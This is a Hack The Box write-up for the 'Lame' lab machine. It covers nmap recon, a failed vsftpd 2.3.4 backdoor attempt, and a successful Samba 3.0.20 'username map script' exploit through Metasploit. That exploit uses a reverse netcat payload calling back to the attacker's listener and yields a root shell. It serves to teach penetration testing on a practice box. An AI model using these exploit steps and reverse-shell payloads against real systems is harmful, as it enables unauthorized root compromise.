---
title: Hack The Box - Lame Writeup
tags: [Samba, Hack The Box]

---

# Hack The Box - Lame Writeup
Writeup for the box Lame in Hack The Box.

## Box Info

| OS    | Difficulty |
| ----- |:---------- |
| Linux | Easy       |

## Recon
### Nmap
Basic scan:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ sudo nmap 10.10.10.3 -oA nmap/initial      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 20:57 CST
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
```

Scan the open ports with the default scripts and version detection:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ sudo nmap -sC -sV 10.10.10.3 -p21,22,139,445 -oA nmap/lame
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 20:59 CST
Nmap scan report for 10.10.10.3
Host is up (0.18s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h50m11s, deviation: 2h49m45s, median: -9m51s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-10-10T08:50:20-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.28 seconds
```

## Vsftpd 2.3.4
Searching the FTP version shows that vsftpd 2.3.4 has a known Command Execution issue: the 2.3.4 tarball on the project's download site was backdoored in 2011, and a login whose USER value contains `:)` makes the daemon open a root shell on TCP port 6200.

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ searchsploit vsftpd 2.3.4
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                     | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                        | unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

### Metasploit
Try it with Metasploit first:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ msfconsole -q
msf6 > search vsftpd 2.3.4

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
```

```bash
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.3       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
```

After setting the options and running the module, the attack does not succeed. The module sends the `:)` username, gets the normal `331` reply, and then fails to reach the shell the backdoor should have opened on port 6200. The first scan reported every other port as filtered, so even if the backdoor fires, its listener is unreachable from here:

```bash
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```

### Python script

Switch to the other entry from searchsploit, the standalone Python script:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ cp /usr/share/exploitdb/exploits/unix/remote/49757.py .
```

Running it fails the same way. Instead of reporting an error the script simply hangs: after triggering the backdoor it connects to port 6200 through telnetlib with no timeout, and since nothing answers on that port it waits forever:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ python3 49757.py           
/home/parallels/Documents/Hack The Box/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet
usage: 49757.py [-h] host
49757.py: error: the following arguments are required: host

┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ python3 49757.py 10.10.10.3
/home/parallels/Documents/Hack The Box/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet

```

## Samba 3.0.20

Moving on to SMB, a search for Samba 3.0.20 also turns up a Command Execution entry, the "username map script" bug:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ searchsploit samba 3.0.20
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                |  Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                        | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                              | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                         | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                 | linux_x86/dos/36741.py
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

### Metasploit
Try Metasploit again:

```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame]
└─$ msfconsole -q
msf6 > search samba 3.0.20                               

Matching Modules                                                                                                                                                
================                                         

   #  Name                                Disclosure Date  Rank       Check  Description                                                                        
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
```

Set the relevant options (RHOSTS, LHOST and LPORT):

```bash
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.3       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.16.5       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
```

```bash
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.10.3:34049) at 2024-10-10 23:34:14 +0800

which python python2 python3
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# 
```

The session is root straight away: smbd runs the username map script with its own privileges, so no separate privilege escalation is needed and the flags can be read directly.

### user.txt

```shell
root@lame:/home/makis# cat user.txt
cat user.txt
990f046d************************
```

### root.txt

```shell
root@lame:/root# cat root.txt
cat root.txt
e5035455************************
```